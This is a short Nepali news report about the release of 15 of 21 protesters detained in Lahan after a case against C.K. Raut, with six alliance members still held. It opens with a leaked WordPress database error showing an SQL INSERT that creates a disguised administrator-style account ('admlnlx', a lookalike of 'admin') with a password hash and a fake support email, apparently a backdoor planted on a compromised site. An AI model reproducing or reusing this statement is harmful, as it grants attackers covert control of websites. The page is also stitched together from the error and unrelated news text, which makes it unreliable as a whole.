WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjs4Qh.Fgf.WSZu.3CucBl/g4c7PJk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 15:16:15', '', 'admlnlx', 'admlnlx')
सिराहा,माघ २२-
सि.के. राउतविरुद्ध राज्य विरुद्धको संगठित अपराध अन्तर्गत मुद्दा चलाइएपछि हिजो उनको रिहाईको माग गर्दै लहानमा प्रदर्शन गर्ने क्रममा पक्राउ परेका २१ जनामध्ये १५ जनालाई गएराती अबेर छाडिएको छ ।
इलाका प्रहरी कार्यालय लहानका प्रहरी नायव उपरीक्षक राजकुमार के.सी.ले शुक्रबार दिउँसो करिब साढे दुई बजेतिर पक्राउ परेका उनीहरुमध्ये १५ जनालाई छाडिएको बताए । बाँकी ६ जनालाई भने थप अनुसन्धानका लागि प्रहरी नियन्त्रणमै राखिएको जानकारी दिए ।
प्रहरी नायव उपरीक्षक के.सी.ले प्रहरी नियन्त्रणमै रहेका ६ जना स्वतन्त्र मधेश गठबन्धनको सिरहा जिल्ला परिषद् सदस्य र सकृय सदस्य रहेको खुलेको बताए ।
राउत विरुद्ध इलाका प्रहरी कार्यालय लहानमार्फत् राज्य विरुद्धको संगठित अपराध अन्तर्गत मुद्दा दायर गरी शुक्रबार दिउँसो सिरहा जिल्ला अदालतबाट अनुसन्धानका लागि १० दिनको म्याद थप गरिएको छ ।बिहीबार दिउँसो धनुषाको जनकपुरबाट राउत पक्राउ परेका थिए ।